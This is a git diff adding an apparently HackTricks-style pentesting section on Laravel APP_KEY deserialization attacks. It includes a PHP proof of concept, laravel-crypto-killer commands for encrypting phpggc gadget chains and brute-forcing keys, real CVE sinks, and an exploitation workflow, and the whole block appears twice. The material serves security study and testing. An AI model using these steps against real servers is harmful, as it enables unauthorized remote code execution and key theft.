diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index c7e66f555..0763e46f8 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -1,5 +1,96 @@ # Laravel +{{#include /banners/hacktricks-training.md}} + +### Laravel SQLInjection + +Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Encryption internals (Laravel \u003e=5.6) + +Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`). +The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like: + +```json +{ + "iv" : "Base64(random 16-byte IV)", + "value": "Base64(ciphertext)", + "mac" : "HMAC_SHA256(iv||value, APP_KEY)", + "tag" : "" // only used for AEAD ciphers (GCM) +} +``` + +`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas +`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value. +Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**. + +Minimal PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode: + +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` + +The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field. + +--- + +## Real-world vulnerable patterns + +| Project | Vulnerable sink | Gadget chain | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | + +The exploitation workflow is always: +1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) +2. Generate gadget with **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Deliver payload through the vulnerable parameter/cookie → **RCE** + +--- + +## Mass APP_KEY discovery via cookie brute-force + +Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline. + +Key findings of the research published by Synacktiv (2024-2025): +* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k) +* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked** +* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data. +* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …). + +The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes. + +--- + +## References +* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + {{#include ../../banners/hacktricks-training.md}} @@ -101,7 +192,95 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/ Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) +### Laravel SQLInjection + +Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Encryption internals (Laravel \u003e=5.6) + +Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`). +The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like: + +```json +{ + "iv" : "Base64(random 16-byte IV)", + "value": "Base64(ciphertext)", + "mac" : "HMAC_SHA256(iv||value, APP_KEY)", + "tag" : "" // only used for AEAD ciphers (GCM) +} +``` + +`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas +`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value. +Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**. + +Minimal PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode: + +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` + +The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field. + +--- + +## Real-world vulnerable patterns + +| Project | Vulnerable sink | Gadget chain | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | + +The exploitation workflow is always: +1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) +2. Generate gadget with **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Deliver payload through the vulnerable parameter/cookie → **RCE** + +--- + +## Mass APP_KEY discovery via cookie brute-force + +Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline. + +Key findings of the research published by Synacktiv (2024-2025): +* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k) +* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked** +* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data. +* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …). + +The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes. + +--- + +## References +* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + {{#include ../../banners/hacktricks-training.md}} -